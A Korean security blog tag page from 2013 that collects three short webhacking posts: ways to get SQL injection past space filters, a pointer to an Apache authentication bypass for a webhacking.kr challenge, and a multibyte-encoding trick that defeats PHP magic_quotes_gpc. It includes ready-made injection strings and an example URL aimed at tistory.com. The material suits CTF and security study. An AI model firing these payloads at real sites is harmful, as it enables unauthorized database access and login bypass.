'우회' 태그의 글 목록

« 2024/5 »
일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

'우회'에 해당되는 글 3건

2013.03.04 SQL Injection 공백 우회방법
2013.03.04 webhacking.kr 9번 문제 풀이 1
2013.03.04 mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기

SQL Injection 공백 우회방법

Webhacking | 2013. 3. 4. 01:47 | Posted by binaryU

SQL Injection 공격시 공백 문자 필터링시 우회 방법

1. Tab : %09

- no=1%09or%09id='admin'

2. Line Feed (\n): %0a

- no=1%0aor%0aid='admin'

3. Carrage Return(\r) : %0d

- no=1%0dor%0did='admin'

4. 주석 : /**/

- no=1/**/or/**/id='admin'

5. 괄호 : ()

- no=(1)or(id='admin')

6. 더하기 : +

- no=1+or+id='admin'

저작자표시

'Webhacking' 카테고리의 다른 글

XML Attack Surface (0)	2013.08.28
Python Blind Injection Sample (0)	2013.03.04
[PHP2EXE] PHP Compiler/Embedder 1.21 (0)	2013.03.04
.htaccess Attack Sample for PHP (0)	2013.03.04
webhacking.kr 9번 문제 풀이 (1)	2013.03.04

webhacking.kr 9번 문제 풀이

Webhacking | 2013. 3. 4. 01:18 | Posted by binaryU

Apache HTTP Basic Authorization Bypass

bypass_apache_web_authorization.pdf

9번 문제는 일단 인증을 우회하고 들어간다음...

본격적으로 문제를 풀어야 하는데...

인증에서 부터 막히는 사람들이 꽤 많은것 같다...

그런 사람들은 위 pdf 문서를 먼저 참고하면 좋겠다.

저작자표시

'Webhacking' 카테고리의 다른 글

[PHP2EXE] PHP Compiler/Embedder 1.21 (0)	2013.03.04
.htaccess Attack Sample for PHP (0)	2013.03.04
Mysql Table Name Search (0)	2013.03.04
mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기 (0)	2013.03.04
아스키 코드표 (0)	2013.02.12

mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기

Webhacking | 2013. 3. 4. 01:02 | Posted by binaryU

PHP에서 SQL-Injection을 할때, magic_quotes_gpc 설정때문에 '입력이 안될경우 :

mb_convert_encoding 취약점 (%a1 ~ %fe 으로 magic_quotes_gpc %27 우회)

차단 : id=%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest
우회 : id=%aa%27or%201=1%20and%20id=char(97,100,109,105,110)%23&pw=guest

예문) http://www.tistory.com/index.php?id=binaryu%aa%27/*&pw=*/union/**/select/**/3%23

저작자표시

'Webhacking' 카테고리의 다른 글

[PHP2EXE] PHP Compiler/Embedder 1.21 (0)	2013.03.04
.htaccess Attack Sample for PHP (0)	2013.03.04
webhacking.kr 9번 문제 풀이 (1)	2013.03.04
Mysql Table Name Search (0)	2013.03.04
아스키 코드표 (0)	2013.02.12

«이전 1 다음»

BinaryU

Tags»

Category»

Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

My Link»

'우회'에 해당되는 글 3건

SQL Injection 공백 우회방법

'Webhacking' 카테고리의 다른 글

webhacking.kr 9번 문제 풀이

'Webhacking' 카테고리의 다른 글

mb_convert_encoding 취약점으로 magic_quotes_gpc 우회하기

'Webhacking' 카테고리의 다른 글

티스토리툴바